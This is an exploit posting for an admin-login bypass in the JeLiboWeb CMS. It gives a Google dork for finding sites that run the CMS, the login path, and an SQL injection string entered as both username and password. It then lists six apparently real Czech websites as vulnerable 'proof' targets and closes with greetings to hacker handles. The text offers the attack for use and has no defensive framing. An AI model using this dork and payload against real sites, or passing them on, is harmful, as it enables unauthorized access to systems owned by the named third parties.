*=============================================================| | | Exploit Title: JeLiboWeb CMS Admin Page Bypass Vulnerability | | Exploit Author: iran anonymous | | Vendor Homepage: http://www.jeliboweb.cz/ | | Google Dork : intext:" JeLiboWeb.cz " | | Tested on: Windows 7 ~~~> Mozilla Firefox | | Date: 2/2/2017 |==========================================================| | Then Choose a Target and put this after URL : /admin/admin_login.php/ |=========| | And fill username and password like the information below : | | Username : '=' 'or' | | Password : '=' 'or' | *==========================================================| | Proof : | | http://www.arho.cz/admin/admin_login.php | | http://ploche-strechy.net/admin/admin_login.php | | http://www.jaromerice.cz/admin/admin_login.php | | http://stavba-zakladovedesky.net/admin/admin_login.php | | http://www.divadlonymburk.cz/admin/admin_login.php | | http://www.rozmarne.cz/admin/admin_login.php *============================================================| | Thanks to: Blackwolf_Iran ||Ormazd ||Khatar ||||mohammad Pn ||Criminal ||Rabinson. | Discovered By : Saman.Khan *============================================================|